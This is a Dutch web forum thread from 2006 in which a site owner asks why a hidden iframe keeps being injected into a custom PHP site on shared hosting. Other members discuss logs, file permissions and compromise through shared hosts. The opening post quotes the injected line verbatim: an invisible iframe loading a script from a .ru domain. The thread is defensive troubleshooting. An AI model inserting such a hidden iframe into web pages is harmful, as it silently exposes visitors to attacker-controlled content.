Html injection

Plaats reactie
crapiecorn
Elite Poster
Elite Poster
Berichten: 2149
Lid geworden op: 01 feb 2003, 11:58
Uitgedeelde bedankjes: 44 keer
Bedankt: 12 keer

Een site die ik regelmatig bezoek is al een paar keer aangevallen door een soort van code injection.

Code: Selecteer alles

<iframe name='StatPage' src='http://stelaartois.ru/xxxxx2.php' width=5 height=5 style='display:none'></iframe>

Dit wordt altijd net onder de body toegevoegd. Sql injection en via forms is al uitgesloten. Code is ook custom. Heeft iemand misschien een idee wat dit kan veroorzaken ? (file permissions staan ook goed)
Laatst gewijzigd door crapiecorn 30 nov 2006, 19:14, in totaal 2 gewijzigd.
Omhoog
Gebruikersavatar
meon
Administrator
Administrator
Berichten: 16609
Lid geworden op: 18 feb 2003, 22:02
Twitter: meon
Locatie: Bree
Uitgedeelde bedankjes: 564 keer
Bedankt: 759 keer
Contacteer:
Contacteer meon

Is dit op shared hosting?
Of Virtual Hosting?
Omhoog
crapiecorn
Elite Poster
Elite Poster
Berichten: 2149
Lid geworden op: 01 feb 2003, 11:58
Uitgedeelde bedankjes: 44 keer
Bedankt: 12 keer

shared
Omhoog
wem
Premium Member
Premium Member
Berichten: 666
Lid geworden op: 24 mei 2004, 14:48

zijn het pure html-files, of php-files (of nog iets anders)?
Kan je zien wanneer ze gewijzigd zijn? Zo kan je via de logs van de server misschien rare http-queries vinden die tot de oorzaak leiden.
Omhoog
Gebruikersavatar
meon
Administrator
Administrator
Berichten: 16609
Lid geworden op: 18 feb 2003, 22:02
Twitter: meon
Locatie: Bree
Uitgedeelde bedankjes: 564 keer
Bedankt: 759 keer
Contacteer:
Contacteer meon

Indien shared: afh. van de configuratie kunnen anderen die toegang hebben tot de server (andere klanten) soms met wat spelen met eigen PHP-scripts toegang tot anderen hun files krijgen. Zou dit gebeurd kunnen zijn?
Omhoog
KK
Elite Poster
Elite Poster
Berichten: 909
Lid geworden op: 02 okt 2004, 04:38

Er moet maar 1 klant zijn die op zijn site een slecht beveiligd formulier staan heeft (waardoor er code kan uitgevoerd worden), om het voor alle andere klanten om zeep te helpen.
Omhoog
crapiecorn
Elite Poster
Elite Poster
Berichten: 2149
Lid geworden op: 01 feb 2003, 11:58
Uitgedeelde bedankjes: 44 keer
Bedankt: 12 keer

meon schreef:Indien shared: afh. van de configuratie kunnen anderen die toegang hebben tot de server (andere klanten) soms met wat spelen met eigen PHP-scripts toegang tot anderen hun files krijgen. Zou dit gebeurd kunnen zijn?

Ik denk dat het probleem groter is dan 1 server alleen. Ik heb zowel amerikaanse als chinese, duitse websites gevonden met dit probleem. Website draait een soort van custom portal system in php/mysql. Met shared hosting ben je uiteindelijk zeer beperkt voor logs na te kijken.
Omhoog
wem
Premium Member
Premium Member
Berichten: 666
Lid geworden op: 24 mei 2004, 14:48

crapiecorn schreef:Met shared hosting ben je uiteindelijk zeer beperkt voor logs na te kijken.


Toch is het soms mogelijk dit zelf te doen (ik weet dat ik op mijn vroegere hosting volledige access tot mijn logs had, nu heb ik er geen idee van eigelijk). En anders kan je, in zo'n geval, nog altijd gedetailleerde informatie vragen aan het hosting-bedrijf.

Worden scripts eigelijk uitgevoerd met jou rechten, of met die van de webserver-account? En is schrijven op die files toegelaten, of is ook dat aangepast?
Omhoog
Plaats reactie

Terug naar “Development”